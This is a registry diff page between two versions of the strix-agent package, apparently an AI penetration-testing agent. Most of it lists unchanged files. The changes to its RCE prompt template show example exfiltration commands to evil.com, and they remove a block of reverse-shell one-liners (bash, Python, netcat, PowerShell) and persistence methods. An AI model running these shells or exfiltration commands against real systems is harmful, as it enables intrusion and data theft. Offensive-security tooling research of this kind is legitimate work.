strix-agent 0.1.14__tar.gz → 0.1.16__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of strix-agent might be problematic. Click here for more details.
- {strix_agent-0.1.14 → strix_agent-0.1.16}/PKG-INFO +1 -1
- {strix_agent-0.1.14 → strix_agent-0.1.16}/pyproject.toml +1 -1
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/rce.jinja +2 -18
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/sql_injection.jinja +0 -1
- {strix_agent-0.1.14 → strix_agent-0.1.16}/LICENSE +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/README.md +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/strix_agent.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/StrixAgent/system_prompt.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/base_agent.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/agents/state.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/app.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/assets/cli.tcss +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/main.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/agents_graph_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/base_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/browser_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/file_edit_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/finish_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/notes_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/proxy_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/python_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/registry.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/reporting_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/scan_info_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/terminal_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/thinking_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/user_message_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/web_search_renderer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tracer.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/config.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/llm.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/memory_compressor.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/request_queue.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/llm/utils.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/coordination/root_agent.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/authentication_jwt.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/business_logic.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/csrf.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/idor.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/race_conditions.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/ssrf.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/xss.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/xxe.jinja +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/docker_runtime.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/runtime.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/runtime/tool_server.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/agents_graph_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/agents_graph_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/argument_parser.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/browser_instance.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/browser/tab_manager.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/executor.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/file_edit_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/file_edit_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/finish_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/finish/finish_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/notes_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/notes/notes_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/proxy/proxy_manager.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_instance.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/python/python_manager.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/registry.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/reporting_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/reporting_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_manager.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/terminal/terminal_session.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/thinking_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/thinking/thinking_actions_schema.xml +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/__init__.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/web_search_actions.py +0 -0
- {strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/web_search_actions_schema.xml +0 -0
|
@@ -59,7 +59,7 @@ ${IFS}id
|
|
|
59
59
|
|
|
60
60
|
<language_specific_rce>
|
|
61
61
|
<php>
|
|
62
|
-
- eval(
|
|
62
|
+
- eval() with user input
|
|
63
63
|
- system(), exec(), shell_exec(), passthru()
|
|
64
64
|
- preg_replace with /e modifier
|
|
65
65
|
- assert() with string input
|
|
@@ -101,7 +101,7 @@ Works in multiple contexts:
|
|
|
101
101
|
- DNS exfiltration: $(whoami).evil.com
|
|
102
102
|
- HTTP callbacks: curl evil.com/$(id)
|
|
103
103
|
- Time delays for boolean extraction
|
|
104
|
-
- Write to web root
|
|
104
|
+
- Write to web root
|
|
105
105
|
</blind_rce>
|
|
106
106
|
|
|
107
107
|
<chained_exploitation>
|
|
@@ -163,22 +163,6 @@ concat:|file:///etc/passwd
|
|
|
163
163
|
- Path traversal: /usr/bin/id vs id
|
|
164
164
|
</waf_bypasses>
|
|
165
165
|
|
|
166
|
-
<post_exploitation>
|
|
167
|
-
<reverse_shells>
|
|
168
|
-
Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
|
|
169
|
-
Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
|
|
170
|
-
Netcat: nc -e /bin/sh attacker 4444
|
|
171
|
-
PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
|
172
|
-
</reverse_shells>
|
|
173
|
-
|
|
174
|
-
<persistence>
|
|
175
|
-
- Cron jobs
|
|
176
|
-
- SSH keys
|
|
177
|
-
- Web shells
|
|
178
|
-
- Systemd services
|
|
179
|
-
</persistence>
|
|
180
|
-
</post_exploitation>
|
|
181
|
-
|
|
182
166
|
<validation>
|
|
183
167
|
To confirm RCE:
|
|
184
168
|
1. Execute unique command (id, hostname)
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/agents_graph_renderer.py
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/cli/tool_components/user_message_renderer.py
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/authentication_jwt.jinja
RENAMED
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/business_logic.jinja
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/prompts/vulnerabilities/race_conditions.jinja
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/agents_graph/agents_graph_actions_schema.xml
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/file_edit/file_edit_actions_schema.xml
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/reporting/reporting_actions_schema.xml
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{strix_agent-0.1.14 → strix_agent-0.1.16}/strix/tools/web_search/web_search_actions_schema.xml
RENAMED
|
File without changes
|